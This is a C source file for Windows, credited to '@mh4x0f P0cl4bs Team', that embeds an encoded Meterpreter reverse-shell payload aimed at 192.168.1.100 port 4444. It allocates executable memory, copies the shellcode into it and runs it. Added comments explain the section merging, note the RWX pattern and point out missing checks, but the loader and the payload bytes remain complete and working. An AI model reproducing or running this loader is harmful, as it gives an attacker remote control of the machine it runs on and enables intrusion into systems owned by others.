#include <windows.h>
/*
------------------------------------------------
Author: @mh4x0f P0cl4bs Team
-----------------------------------------------
*/
// Section layout. The intent is one section that is readable, writable and
// executable at the same time: ".code" is declared execute/read/write,
// ".codedata" read/write, then the linker merges ".codedata" into ".code"
// and forces that section's characteristics to ERW.
#pragma section(".code",execute, read, write)
#pragma section(".codedata", read, write)
// merge the data section into the code section
#pragma comment(linker,"/MERGE:.codedata=.code")
// mark the merged section Execute/Read/Write
#pragma comment(linker,"/SECTION:.code,ERW")
// NOTE(review): a PE whose section is both writable and executable is an
// observable characteristic of the binary itself, independent of any payload.
// Everything declared after this point (initialised data, constants and code)
// is placed in these sections ("where all the global variables live").
#pragma data_seg(".codedata")
#pragma const_seg(".codedata")
#pragma code_seg(".code")
/* meterpreter 192.168.1.100 port 4444 encoded shikata_ga_nai 10 */
/* Payload buffer. The only description of its contents is the author's note
   above; nothing in this file decodes or inspects it, so from here on it is
   an opaque byte string. Because data_seg above names ".codedata", the array
   is placed in the merged writable+executable section. It is written as a
   string literal, so sizeof shellcode counts one trailing NUL byte in
   addition to the payload bytes. */
unsigned char shellcode[] =
"\xb8\xca\x31\x30\xe8\xda\xdf\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x86\x31\x42\x13\x83\xc2\x04\x03\x42\xc5\xd3\xc5\x33\x1b\xca"
"\x52\xe0\x6f\x52\xe0\xd4\x57\xcd\x48\x0e\xae\xbf\x0c\x61\x4d"
"\xd9\x71\x44\xa9\xda\x08\x52\x29\x15\x91\x69\xe6\x66\x23\xfd"
"\x5e\x9a\xce\xb5\x52\xc6\x16\xc8\xf7\x2b\x86\x17\xcf\xfd\xcd"
"\x9a\xbe\xc2\xb8\x2b\x95\xd5\xc4\xba\xc8\x41\xea\x78\x3a\x9e"
"\x81\x9d\xb5\xce\xea\xc2\xa9\xb5\x2d\xe2\x09\x32\xe3\x4f\xcf"
"\xd2\x59\x70\x42\x47\x2b\x35\xe7\xb5\x03\x70\xe7\x29\x09\x76"
"\xac\x7c\x89\x65\x93\x62\x8e\x1c\x91\xfb\xf9\x73\x67\xf2\x68"
"\x6e\x06\x11\x30\xb0\x28\x89\xcc\x66\x3e\x44\x05\xfa\x8f\x50"
"\x42\x23\xb5\xa8\x29\xa2\x99\x14\xb8\x79\x67\xc7\x45\x25\x6e"
"\x1b\x56\xad\xe9\x9e\x2c\x0e\xc8\x48\xbe\xad\x02\x44\xc4\x64"
"\x5b\x85\xe9\x87\x23\xef\xd8\x47\x27\x26\xf8\x2e\x50\xde\xf1"
"\x29\x6b\x68\x3b\xc1\x41\x65\xdc\x58\x14\x85\x1e\xc5\x20\xbf"
"\xe6\xd5\xb9\xbb\x44\x68\x3f\x77\x0f\x7c\xad\xe5\xc0\x73\x06"
"\xa0\x71\x1c\xb0\x7a\x25\x31\x9c\xe5\xaf\x01\x09\x0b\x2e\xf3"
"\x9a\x18\x50\xe8\x47\x03\x7f\x25\x32\x88\xdb\x3a\x2a\x93\x12"
"\xf8\x2a\xf4\x12\xf2\x23\xa6\x98\x67\xfd\xe7\xa2\xc8\x90\xc8"
"\x9c\x72\x80\xf7\xfe\x23\x54\x6c\xd8\x64\x4a\x23\x2e\x2a\x19"
"\x09\x95\x98\xa5\x14\x01\x33\x56\xee\xd5\x62\xac\x60\x4d\xe2"
"\x98\x3b\xaf\x86\x04\x79\x61\x91\xe6\x46\x1f\x0b\xc9\x66\x63"
"\x5d\x4f\x57\x3d\x8d\x96\x1a\x64\x34\xab\xe5\xa6\x39\xd7\x92"
"\x10\x05\x41\x0b\x0b\xef\x06\xf7\xfa\x28\x67\xc2\x44\x75\xd6"
"\xef\x4f\xa0\xa2\x93\x3d\xad\x20\xb6\x19\xc4\xfa\xd7\x0e\x6b"
"\x3a\x0e\xcc\x75\xf7\xa2\xf0\x6d\x09\xc0\xf1\x37\x12\x06\x2c"
"\xa9\x69\xf6\x3e\xc5\x2d\xea\x69\x42\x22\x60\x5b\x6b\xf2\x6f"
"\x61\xe9\x93\x19\xc1\x97\x9f\xe9\x45\x03\x1b\xe8\x3f\xaa\xe5"
"\xda\xc3\x8d\x89\xd4\x5d\xf0\x7c\xc4\x4d\x40\x20\xb2\xaa\x29"
"\x40\xfd\x67\xcf\x91\x18\xe5\xb4\x75\x21\x21\x89\x71\xa1\x9a"
"\x05\xd5\x39\x48\x2d\xcf\xa1\x29\x9e\xd5\x5e\x3c\xfb\xc6\x8b"
"\xc1\xaf\x1d\x9e\x4d\x46\x05\x94\x61\xbb\x28\xb2\xe9\xff\xe5"
"\xfd\x58\xfe\x3c\xc0\xd9\x47\xaf\x79\xf5\x39\x1d\xcc\x64\x89"
"\xbc\x5b\x87\xab\x36\x26\xd5\xd3\x18\x01\x2d\xd5\xd1\xe3\xb6"
"\x0e\x37\x52\x8c\x70\x12\x9e\x67\xd9\x22\xe7\xa4\xc3\x01\x4b"
"\x7c\x43\xf9\xc1\x28\xf4\x65\xef\xb1\x53\x89\x81\x33\x09\xdc"
"\xae\x27\xf5\xa6\x36\x1b\xf9\x2d\xb7\xaf\x6d\x62\x0c\x10\xf1"
"\xfc\x3e\x07\x84\xc9\x08\x18\x91\xbd\x50\x07\xbb\x76\xb8\x0f"
"\x2d\xcc\x18\x3c\xa4";
// Program entry point (Windows GUI-subsystem signature). None of the four
// parameters is used. The function is placed in ".code" by the code_seg
// pragma above.
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR szCmdLine, int iCmdShow) {
typedef void (*fp)();
/* Request one 4096-byte region that is readable, writable and executable
   at once (PAGE_EXECUTE_READWRITE). Despite the file name this is not a DEP
   bypass: DEP only refuses execution from pages that are not marked
   executable, and this page is explicitly marked so. An RWX allocation
   followed by a call into it is a commonly monitored pattern.
   NOTE(review): the return value is not checked; on failure VirtualAlloc
   returns NULL and the CopyMemory below would write through it. */
void * heap = (void *)VirtualAlloc(
NULL,
4096,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
// Copy the entire literal, trailing NUL included, into the new region.
// Nothing verifies sizeof shellcode <= 4096; it fits for the literal above.
CopyMemory(heap, shellcode, sizeof shellcode);
// Reinterpret the buffer as a function and transfer control into it.
// Whether control ever comes back depends on the payload; `return 0` is
// reached only if it does.
fp func = (fp)heap;
(*func)(); // execute shellcode
return 0;
}
// A second section pair, set up the same way as ".code"/".codedata" above:
// ".stub" is execute/read/write, ".stubdata" read/write, and the two are
// merged. From here on data, constants and code would be placed in ".stub".
// Nothing follows these pragmas in the file as shown, so they only affect
// definitions appended after them.
#pragma section(".stub", execute, read, write)
#pragma code_seg(".stub")
#pragma section(".stubdata", read, write)
#pragma comment(linker,"/MERGE:.stubdata=.stub")
#pragma data_seg(".stubdata")
#pragma const_seg(".stubdata")
#pragma code_seg(".stub")